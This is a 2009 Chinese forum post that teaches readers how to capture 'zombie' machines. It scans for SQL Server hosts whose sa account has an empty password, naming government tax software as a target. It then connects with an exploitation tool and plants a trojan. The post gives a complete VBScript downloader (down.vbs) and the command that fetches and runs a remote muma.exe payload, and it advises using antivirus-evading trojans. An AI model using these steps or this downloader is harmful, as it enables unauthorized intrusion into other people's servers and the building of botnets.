计算机技术论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

  • 欢迎访问 计算机技术论坛-电脑迷与初学者的家园!由于论坛管理严格,新注册会员可能遇到各种问题,无法解决的请发邮件 admin@jsjbbs.cn
查看: 2842|回复: 0

快速抓肉机

[复制链接]
发表于 2009-5-5 16:39:12 | 显示全部楼层 |阅读模式
不要以为这个世界没有sa空口令的机器了,或许作为一个服务器的很少,但是现在很多软件都是使用sql数据库的,而软件的设计者(公司)一般都设置sql密码是空口令。最近发现某地一款政府指定使用的税务软件就是空口令,而且安装的专业人员都是这么设置的。

准备工具:WINNTAutoAttack sql综合利用工具
1:使用WINNTAutoAttack扫描sql空口令的ip,ip自己选择好了。如果RP没有问题的话,肯定会有的,只是多少的问题而已。
2:打开sql综合利用工具,填入你扫到的sa空口令的ip,其他都是默认的。
3:连接成功以后,有两个方法。
方法一:上传那里直接上传一个木马,当然不要文件太大了,最好是免杀的。然后在直接执行dos命令运行你的木马文件就行了。
方法二:在命令行echo一个down.vbs进去,down.vbs内容如下:
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

echo完以后,最好type 你的文件名 看看成不成功。成功的话,c:\down.vbs http://www.sina.com/muma.exe c:\muma.exe (假设你的down.vbs放在c盘),然后直接dos下运行下载的木马就行了。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

无图版|手机版|计算机技术论坛 JSJBBS.CN @ 2008-2024 ( 鲁ICP备17021708号 )

技术支持 : 北京康盛新创科技有限责任公司

快速回复 返回顶部 返回列表